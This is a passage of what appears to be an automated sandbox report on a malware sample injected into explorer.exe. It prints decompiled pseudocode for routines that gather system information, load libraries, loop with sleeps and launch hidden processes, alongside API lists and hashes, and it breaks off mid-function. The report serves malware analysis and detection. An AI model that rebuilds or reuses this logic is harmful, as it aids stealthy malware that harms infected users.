                                                                                                                                                                        • Instruction ID: f2bc0fa7119100205c0a3a474c250de0b983a68f2cb190b5fdc0cc0d36a85ad3
                                                                                                                                                                        • Opcode Fuzzy Hash: 6ea867de68931dfdcb426fc09526ad2af03eda0bc8958722b85d5b1c56524908
                                                                                                                                                                        • Instruction Fuzzy Hash: F2118E72A04108EFCB04EB99EC46DDD77F8EB85710F20826AF405E7291DA349F00C754
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A8F8D Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 107stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007A8F8D(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E007A8BDE(0x448);
				_v20 = _t72;
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E007A8BDE(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E007A8E08(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							_t21 =  &_v8; // 0x7a5453
							E007A8BF4(_t21, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0x7bf818; // 0xeaf6c8
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E007A8BF4(_t73, 0);
						}
						E007A8BF4( &_v20, 0); // executed
						goto L1;
					}
					_t43 = E007AB3C7(_v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E007A8E33(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0x7bf818; // 0xeaf6c8
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						_t19 =  &_v8; // 0x7a5453
						E007A8BF4(_t19, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}















                                                                                                                                                                        0x007a8f93
                                                                                                                                                                        0x007a8f9a
                                                                                                                                                                        0x007a8f9c
                                                                                                                                                                        0x007a8fa4
                                                                                                                                                                        0x007a8fa6
                                                                                                                                                                        0x007a8fae
                                                                                                                                                                        0x007a8fb0
                                                                                                                                                                        0x007a8fb6
                                                                                                                                                                        0x007a8fca
                                                                                                                                                                        0x007a8fd1
                                                                                                                                                                        0x007a8fd7
                                                                                                                                                                        0x007a8fe0
                                                                                                                                                                        0x007a9038
                                                                                                                                                                        0x007a903d
                                                                                                                                                                        0x007a9046
                                                                                                                                                                        0x007a9093
                                                                                                                                                                        0x007a9096
                                                                                                                                                                        0x007a909e
                                                                                                                                                                        0x007a90a2
                                                                                                                                                                        0x007a90a2
                                                                                                                                                                        0x007a90a7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a90a7
                                                                                                                                                                        0x007a9048
                                                                                                                                                                        0x007a904a
                                                                                                                                                                        0x007a904c
                                                                                                                                                                        0x007a9052
                                                                                                                                                                        0x007a9058
                                                                                                                                                                        0x007a9059
                                                                                                                                                                        0x007a9059
                                                                                                                                                                        0x007a9061
                                                                                                                                                                        0x007a9064
                                                                                                                                                                        0x007a9069
                                                                                                                                                                        0x007a9069
                                                                                                                                                                        0x007a906c
                                                                                                                                                                        0x007a9075
                                                                                                                                                                        0x007a907a
                                                                                                                                                                        0x007a9080
                                                                                                                                                                        0x007a9087
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a908d
                                                                                                                                                                        0x007a8fe9
                                                                                                                                                                        0x007a8fee
                                                                                                                                                                        0x007a8ff0
                                                                                                                                                                        0x007a8ff7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a900c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a900e
                                                                                                                                                                        0x007a900e
                                                                                                                                                                        0x007a9019
                                                                                                                                                                        0x007a901c
                                                                                                                                                                        0x007a9023
                                                                                                                                                                        0x007a9029
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a902f
                                                                                                                                                                        0x007a900c
                                                                                                                                                                        0x007a8fb8
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003,007AAFC5,00000000), ref: 007A8FD7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeaplstrcpyn
                                                                                                                                                                        • String ID: STz
                                                                                                                                                                        • API String ID: 680773602-4290529673
                                                                                                                                                                        • Opcode ID: d18b230c5f8e35b178b2419d2384b62b00aa28d6c77400a422a4d0bc8b2082bf
                                                                                                                                                                        • Instruction ID: 42fe4682e4b7fb8977ef2fb5795841b4eb3675aaec3eb5ab42b984a0bf57650d
                                                                                                                                                                        • Opcode Fuzzy Hash: d18b230c5f8e35b178b2419d2384b62b00aa28d6c77400a422a4d0bc8b2082bf
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A31C5B2A00305EFDB509B68DC45B9FB7A8EFC2360F604629F61597281DF39AA008758
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AB5FB Relevance: 3.1, APIs: 2, Instructions: 76processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E007AB5FB(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v96;
				signed int _t27;
				intOrPtr _t33;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr* _t43;
				long _t46;
				WCHAR* _t48;

				_t46 = 0x44;
				E007A8D6D( &_v96, 0, _t46);
				E007A8D6D( &_v24, 0, 0x10);
				_t27 = _a16;
				_v96.cb = _t46;
				_t48 = 1;
				if(_t27 != 0) {
					_v96.dwFlags = 1;
					_v96.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t27 & 0x08000000, 0, 0,  &_v96,  &_v24) == 0) {
					_t48 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t38 =  *0x7bf818; // 0xeaf6c8
						_push(_v24.hProcess);
						if( *((intOrPtr*)(_t38 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v24.hProcess, _a8);
						}
					}
					_t43 = _a20;
					if(_t43 != 0) {
						 *_t43 = _v24.dwProcessId;
					}
					_t33 =  *0x7bf818; // 0xeaf6c8
					 *((intOrPtr*)(_t33 + 0x30))(_v24.hThread);
					_t35 =  *0x7bf818; // 0xeaf6c8
					 *((intOrPtr*)(_t35 + 0x30))(_v24);
				}
				return _t48;
			}












                                                                                                                                                                        0x007ab605
                                                                                                                                                                        0x007ab60e
                                                                                                                                                                        0x007ab61a
                                                                                                                                                                        0x007ab61f
                                                                                                                                                                        0x007ab625
                                                                                                                                                                        0x007ab62a
                                                                                                                                                                        0x007ab62d
                                                                                                                                                                        0x007ab631
                                                                                                                                                                        0x007ab634
                                                                                                                                                                        0x007ab634
                                                                                                                                                                        0x007ab641
                                                                                                                                                                        0x007ab65d
                                                                                                                                                                        0x007ab6a6
                                                                                                                                                                        0x007ab65f
                                                                                                                                                                        0x007ab662
                                                                                                                                                                        0x007ab664
                                                                                                                                                                        0x007ab667
                                                                                                                                                                        0x007ab66c
                                                                                                                                                                        0x007ab674
                                                                                                                                                                        0x007ab67c
                                                                                                                                                                        0x007ab67c
                                                                                                                                                                        0x007ab674
                                                                                                                                                                        0x007ab682
                                                                                                                                                                        0x007ab687
                                                                                                                                                                        0x007ab68c
                                                                                                                                                                        0x007ab68c
                                                                                                                                                                        0x007ab68e
                                                                                                                                                                        0x007ab696
                                                                                                                                                                        0x007ab699
                                                                                                                                                                        0x007ab6a1
                                                                                                                                                                        0x007ab6a1
                                                                                                                                                                        0x007ab6ad

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8D6D: memset.MSVCRT ref: 007A8D7F
                                                                                                                                                                        • CreateProcessW.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 007AB658
                                                                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 007AB67C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CodeCreateExitmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4170947310-0
                                                                                                                                                                        • Opcode ID: 9c027bc269e349096a66d3355c7102ccef48364544ee4a8bc5de8fbfe9f72e0e
                                                                                                                                                                        • Instruction ID: a60614f1ada7e897a32e333938d791ee83ee21b2026e19016c689021ab6f189c
                                                                                                                                                                        • Opcode Fuzzy Hash: 9c027bc269e349096a66d3355c7102ccef48364544ee4a8bc5de8fbfe9f72e0e
                                                                                                                                                                        • Instruction Fuzzy Hash: E9215031A10119AFCF109FAADC49EEF7BB8EF89B01B004229F915E6161D7349900CB65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A5C22 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60sleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E007A5C22(void* __edx, void* __edi) {
				void* _t3;
				intOrPtr _t5;
				void* _t17;
				void* _t27;
				void* _t39;

				_t39 = __edi;
				_t3 = E007AA96C(0x3b); // executed
				if(_t3 != 0xffffffff) {
					L2:
					E007AB297();
					_t5 =  *0x7bf81c; // 0x7d0000
					E007AAA65(0x3a,  *((intOrPtr*)(_t5 + 0x1640))); // executed
					E007AF53A(_t43);
					if(E007A5BAA(_t43) != 0) {
						E007AA108();
						E007AA205(E007A5BEA, 0, __eflags, 0, 0); // executed
						E007A14F2(0); // executed
						E007A34CC(__eflags);
						E007A3501(); // executed
						E007A36AA(0, __eflags); // executed
						E007A2E6B(); // executed
						E007A4209(_t39, __eflags); // executed
						while(1) {
							_t17 = E007A5ECE();
							__eflags = _t17;
							if(_t17 != 0) {
								break;
							}
							E007AA065(0x7bf8e8);
							_push(0x7bf8e8);
							_push(0x7bf8e8); // executed
							E007A2CA6();
							Sleep(0xfa0);
						}
						E007A438B();
						E007AA3F5();
						E007A3B22();
						__eflags = 0;
						return 0;
					}
					L3:
					return 1;
				}
				_t27 = E007A32A3();
				_t43 = _t27;
				if(_t27 != 0) {
					goto L3;
				}
				goto L2;
			}








                                                                                                                                                                        0x007a5c22
                                                                                                                                                                        0x007a5c2a
                                                                                                                                                                        0x007a5c33
                                                                                                                                                                        0x007a5c3e
                                                                                                                                                                        0x007a5c3e
                                                                                                                                                                        0x007a5c43
                                                                                                                                                                        0x007a5c50
                                                                                                                                                                        0x007a5c57
                                                                                                                                                                        0x007a5c63
                                                                                                                                                                        0x007a5c6a
                                                                                                                                                                        0x007a5c7a
                                                                                                                                                                        0x007a5c81
                                                                                                                                                                        0x007a5c86
                                                                                                                                                                        0x007a5c8b
                                                                                                                                                                        0x007a5c90
                                                                                                                                                                        0x007a5c95
                                                                                                                                                                        0x007a5c9a
                                                                                                                                                                        0x007a5cc4
                                                                                                                                                                        0x007a5cc4
                                                                                                                                                                        0x007a5cc9
                                                                                                                                                                        0x007a5ccb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5ca6
                                                                                                                                                                        0x007a5cab
                                                                                                                                                                        0x007a5cac
                                                                                                                                                                        0x007a5cad
                                                                                                                                                                        0x007a5cbe
                                                                                                                                                                        0x007a5cbe
                                                                                                                                                                        0x007a5ccd
                                                                                                                                                                        0x007a5cd2
                                                                                                                                                                        0x007a5cd7
                                                                                                                                                                        0x007a5cdc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5cdc
                                                                                                                                                                        0x007a5c65
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5c67
                                                                                                                                                                        0x007a5c35
                                                                                                                                                                        0x007a5c3a
                                                                                                                                                                        0x007a5c3c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007AA065: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,007A52C8), ref: 007AA072
                                                                                                                                                                          • Part of subcall function 007AA065: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007AA092
                                                                                                                                                                        • Sleep.KERNELBASE(00000FA0,?,007A6009), ref: 007A5CBE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                        • String ID: j>{M
                                                                                                                                                                        • API String ID: 2563648476-1785681049
                                                                                                                                                                        • Opcode ID: e1067f009abb2fe3419c2b38ce7fdf7f48901d53ad831d2e7e6b5f2f19670237
                                                                                                                                                                        • Instruction ID: 458c644f56681df096ccf8c26f477023ba3f8a012e1e99839961c0c238bdd840
                                                                                                                                                                        • Opcode Fuzzy Hash: e1067f009abb2fe3419c2b38ce7fdf7f48901d53ad831d2e7e6b5f2f19670237
                                                                                                                                                                        • Instruction Fuzzy Hash: DD018021618A02EAE61477B46C0FB2D32889FC7731F244739B655890D3EE5E99018277
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007ADD81 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007ADD81(void* __ecx) {
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t28;
				void* _t32;
				struct _OSVERSIONINFOA* _t33;

				_t12 =  *0x7bf818; // 0xeaf6c8
				_t33 =  *0x7bf81c; // 0x7d0000
				_t14 = E007AC879( *((intOrPtr*)(_t12 + 0x12c))(_t28, _t32, __ecx)); // executed
				 *((intOrPtr*)(_t33 + 0x110)) = _t14;
				_t3 = _t33 + 0x1644; // 0x7d1644
				_t29 = _t3;
				_t15 =  *0x7bf818; // 0xeaf6c8
				_t16 =  *((intOrPtr*)(_t15 + 0x128))(0, _t3, 0x105);
				_t37 = _t16;
				if(_t16 != 0) {
					_t16 = E007A95F3(_t29, _t37);
				}
				_t5 = _t33 + 0x228; // 0x7d0228
				 *((intOrPtr*)(_t33 + 0x1854)) = _t16;
				 *((intOrPtr*)(_t33 + 0x434)) = E007A95F3(_t5, _t37);
				E007A8D6D(_t33, 0, 0x9c);
				_t33->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t33);
				 *((intOrPtr*)(_t33 + 0x1640)) = GetCurrentProcessId();
				_t21 = E007AF368(_t5);
				_t9 = _t33 + 0x220; // 0x7d0220
				 *((intOrPtr*)(_t33 + 0x21c)) = _t21;
				_t22 = E007AF3A3(_t9); // executed
				 *((intOrPtr*)(_t33 + 0x218)) = _t22;
				return _t22;
			}












                                                                                                                                                                        0x007add85
                                                                                                                                                                        0x007add8b
                                                                                                                                                                        0x007add9a
                                                                                                                                                                        0x007adda4
                                                                                                                                                                        0x007addaa
                                                                                                                                                                        0x007addaa
                                                                                                                                                                        0x007addb0
                                                                                                                                                                        0x007addb8
                                                                                                                                                                        0x007addbe
                                                                                                                                                                        0x007addc0
                                                                                                                                                                        0x007addc4
                                                                                                                                                                        0x007addc4
                                                                                                                                                                        0x007addc9
                                                                                                                                                                        0x007addcf
                                                                                                                                                                        0x007adddf
                                                                                                                                                                        0x007adde9
                                                                                                                                                                        0x007addf1
                                                                                                                                                                        0x007addf4
                                                                                                                                                                        0x007ade00
                                                                                                                                                                        0x007ade06
                                                                                                                                                                        0x007ade0b
                                                                                                                                                                        0x007ade11
                                                                                                                                                                        0x007ade17
                                                                                                                                                                        0x007ade1d
                                                                                                                                                                        0x007ade25

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersionExA.KERNEL32(007D0000,007D0000,?,007A3B9C), ref: 007ADDF4
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,007A3B9C), ref: 007ADDFA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentProcessVersion
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2809935031-0
                                                                                                                                                                        • Opcode ID: c427d490b84c7682b774fa3acf0fb27b1ca1fe7b5ea418e3a35cb29db4645aee
                                                                                                                                                                        • Instruction ID: 00bb053a04b3b4141c3ab6a821458b0b54418acb0fc5c9c788c0c28ba4a4ff4e
                                                                                                                                                                        • Opcode Fuzzy Hash: c427d490b84c7682b774fa3acf0fb27b1ca1fe7b5ea418e3a35cb29db4645aee
                                                                                                                                                                        • Instruction Fuzzy Hash: 82018E71900700DBC720AF70A84AFDA77E4AF8A310F004A39E65687251EF7865418B84
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AF05C Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E007AF05C(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E007A9DD8(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf43) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E007AF011(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E007A8B9C( &_v8);
				return _t25;
			}










                                                                                                                                                                        0x007af05f
                                                                                                                                                                        0x007af062
                                                                                                                                                                        0x007af068
                                                                                                                                                                        0x007af06a
                                                                                                                                                                        0x007af06f
                                                                                                                                                                        0x007af071
                                                                                                                                                                        0x007af07b
                                                                                                                                                                        0x007af07c
                                                                                                                                                                        0x007af08b
                                                                                                                                                                        0x007af07e
                                                                                                                                                                        0x007af07e
                                                                                                                                                                        0x007af07e
                                                                                                                                                                        0x007af08f
                                                                                                                                                                        0x007af096
                                                                                                                                                                        0x007af09c
                                                                                                                                                                        0x007af09c
                                                                                                                                                                        0x007af0a1
                                                                                                                                                                        0x007af0ac

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,007BCA50,?,007A652B,?), ref: 007AF07E
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(00000000,?,?,?,007BCA50,?,007A652B,?), ref: 007AF08B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4133054770-0
                                                                                                                                                                        • Opcode ID: 287c5fdd1bfba0ae17c8b0acd69dfaef31bbfd19a4f51e1d4c76e41e1d1b8d4c
                                                                                                                                                                        • Instruction ID: 802c5a77f50a6ebfcc1407c20031c3f63d4d33e70472f2529cc46497f6d79c4d
                                                                                                                                                                        • Opcode Fuzzy Hash: 287c5fdd1bfba0ae17c8b0acd69dfaef31bbfd19a4f51e1d4c76e41e1d1b8d4c
                                                                                                                                                                        • Instruction Fuzzy Hash: 85F0A771300114ABC714ABE9EC8989BB3ECDFC9351720423AF606D7151EEB89E4086E4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A53C7 Relevance: 2.9, APIs: 2, Instructions: 367COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                        			E007A53C7(intOrPtr* __ecx, void* __edx, void* __eflags, void* __fp0) {
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v66;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* __ebx;
				signed int _t96;
				signed int _t97;
				signed int _t99;
				intOrPtr _t100;
				signed int _t102;
				void* _t105;
				intOrPtr _t108;
				intOrPtr _t113;
				intOrPtr* _t114;
				signed int _t116;
				intOrPtr _t117;
				intOrPtr _t122;
				intOrPtr _t125;
				signed int _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t137;
				intOrPtr _t141;
				signed int _t144;
				signed int _t149;
				intOrPtr _t153;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t160;
				intOrPtr _t172;
				intOrPtr _t183;
				signed int _t187;
				signed int _t192;
				intOrPtr* _t203;
				intOrPtr _t206;
				intOrPtr _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr _t227;
				intOrPtr _t229;
				signed int _t236;
				void* _t237;
				intOrPtr _t239;
				signed int _t241;
				void* _t248;
				intOrPtr _t266;
				intOrPtr* _t273;
				signed int _t275;
				intOrPtr _t277;
				signed int _t278;
				signed int _t280;
				intOrPtr* _t282;
				void* _t283;
				void* _t284;
				void* _t307;

				_t307 = __fp0;
				_t282 = (_t280 & 0xfffffff8) - 0x64;
				_t273 = __ecx;
				_t96 = E007AF14A(__ecx, __edx);
				_t291 = _t96;
				if(_t96 != 0) {
					L31:
					_t97 = _t96 | 0xffffffff;
					__eflags = _t97;
					L32:
					return _t97;
				}
				_t96 = E007A5021(__edx, _t291); // executed
				if(_t96 == 0) {
					goto L31;
				} else {
					_push(0xf89);
					_t248 = 0x10;
					 *0x7bf810 = E007AF05C(0x7bc9f4, _t248);
					 *_t282 = 0x9bf;
					_t99 = E007A9DF2(0x7bc9f4);
					_push(0);
					_push(_t99);
					_v96 = _t99;
					_t100 =  *0x7bf81c; // 0x7d0000
					_t102 = E007A9A5A(_t100 + 0x228);
					_t283 = _t282 + 0xc;
					_v100 = _t102;
					E007A8BAF( &_v96);
					_t105 = E007AC093(_t102);
					_t210 = 3;
					if(_t105 != 0) {
						 *((intOrPtr*)(_t273 + 0x10)) = E007AAFB9();
						 *_t273 = _t210;
					}
					E007A8BF4( &_v100, 0xfffffffe);
					_t108 =  *0x7bf81c; // 0x7d0000
					_t7 = _t108 + 0x114; // 0x7d0114
					_t219 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x110)))); // executed
					E007A50B3( *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x110)))), _t7, _t307, _t273, 0, 0);
					_t266 =  *0x7bf81c; // 0x7d0000
					_t284 = _t283 + 0x14;
					if( *((intOrPtr*)(_t266 + 0x101c)) == _t210) {
						L8:
						E007A8D6D( &_v56, 0, 0x14);
						_v52 = _t273;
						_t284 = _t284 + 0xc;
						_v56 =  *((intOrPtr*)(_t266 + 0x214));
						_t113 =  *0x7bf810; // 0xeafbc8
						_t114 =  *((intOrPtr*)(_t113 + 8));
						_t298 = _t114;
						if(_t114 != 0) {
							_t219 =  &_v48;
							 *_t114(0, 0, 1,  &_v48,  &_v44); // executed
						}
						E007AF326( &_v56, _t298); // executed
						if( *0x7bf8d4 <= 0) {
							L26:
							_t116 = E007A9DF2(_t219, 0x9bf);
							_push(0);
							_push(_t116);
							_v80 = _t116;
							_t117 =  *0x7bf81c; // 0x7d0000
							_t275 = E007A9A5A(_t117 + 0x228);
							_v76 = _t275;
							__eflags = _t275;
							if(_t275 != 0) {
								_t131 = E007AC093(_t275);
								__eflags = _t131;
								if(_t131 != 0) {
									_t134 =  *0x7bf818; // 0xeaf6c8
									 *((intOrPtr*)(_t134 + 0x118))(_t275);
								}
								E007A8BF4( &_v76, 0xfffffffe);
							}
							E007A8BAF( &_v80);
							_t122 =  *0x7bf81c; // 0x7d0000
							lstrcpynW(_t122 + 0x438,  *0x7bf8d8, 0x105);
							_t125 =  *0x7bf81c; // 0x7d0000
							lstrcpynW(_t125 + 0x228,  *0x7bf8d0, 0x105);
							_t277 =  *0x7bf81c; // 0x7d0000
							_t94 = _t277 + 0x228; // 0x7d0228
							 *((intOrPtr*)(_t277 + 0x434)) = E007A95F3(_t94, __eflags);
							E007A8BF4(0x7bf8d8, 0xfffffffe);
							E007A8BF4(0x7bf8d0, 0xfffffffe);
							L19:
							_t97 = 0;
							goto L32;
						}
						_t136 =  *0x7bf810; // 0xeafbc8
						if( *((intOrPtr*)(_t136 + 8)) != 0) {
							_t203 =  *((intOrPtr*)(_t136 + 0xc));
							if(_t203 != 0) {
								 *_t203(_v48);
							}
						}
						_t137 =  *0x7bf81c; // 0x7d0000
						_t219 =  *((intOrPtr*)(_t137 + 0x214));
						if(_t219 == _t210) {
							goto L26;
						}
						if( *((intOrPtr*)(_t137 + 4)) >= 6) {
							__eflags =  *((intOrPtr*)(_t137 + 0x101c)) - _t210;
							if( *((intOrPtr*)(_t137 + 0x101c)) == _t210) {
								E007A5057();
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t141 =  *0x7bf818; // 0xeaf6c8
								 *((intOrPtr*)(_t141 + 0xe4))( &_v72);
								_t219 = _v66;
								_t211 = 0x3c;
								_t144 = _t219 + 0x00000002 & 0x0000ffff;
								_v88 = _t144;
								_v84 = _t144 / _t211 + _v68 & 0x0000ffff;
								_t149 = _t219 + 0x0000000e & 0x0000ffff;
								_v92 = _t149;
								_t254 = _t149 % _t211;
								_v96 = _t149 / _t211 + _v68 & 0x0000ffff;
								_t153 =  *0x7bf81c; // 0x7d0000
								_t155 = E007B0D7E(_t153 + 0x228, _t211, _t149 % _t211, _t307, 0, _t153 + 0x228, 0); // executed
								_t284 = _t284 + 0xc;
								__eflags = _t155;
								if(_t155 >= 0) {
									_t156 = E007A8BDE(0x1000); // executed
									_t278 = _t156;
									_v80 = _t278;
									_pop(_t219);
									__eflags = _t278;
									if(_t278 != 0) {
										_t157 = E007A109A(_t219, 0x338);
										_t227 =  *0x7bf81c; // 0x7d0000
										_v104 = _t157;
										E007A96F3( &_v40, 7, 0xa, _t227 + 0x648);
										_t229 =  *0x7bf81c; // 0x7d0000
										_t160 = E007A65F6(_t254, _t229 + 0x228, 1,  *((intOrPtr*)(_t229 + 0xa0)));
										_t284 = _t284 + 0x1c;
										_v100 = _t160;
										__eflags = _t160;
										if(_t160 != 0) {
											_push(_v92 % _t211 & 0x0000ffff);
											_push(_v96 & 0x0000ffff);
											_push(_v88 % _t211 & 0x0000ffff);
											_push(_v84 & 0x0000ffff);
											_push(_v100);
											_push( &_v40);
											_t172 =  *0x7bf81c; // 0x7d0000
											__eflags = _t172 + 0x1020;
											E007A9E51(_t278, 0x1000, _v104, _t172 + 0x1020);
											E007A8BAF( &_v104);
											E007AB5FB(_t278, 0, 0xbb8, 1, 0); // executed
											_t284 = _t284 + 0x40;
											E007A8BF4( &_v100, 0xfffffffe);
										}
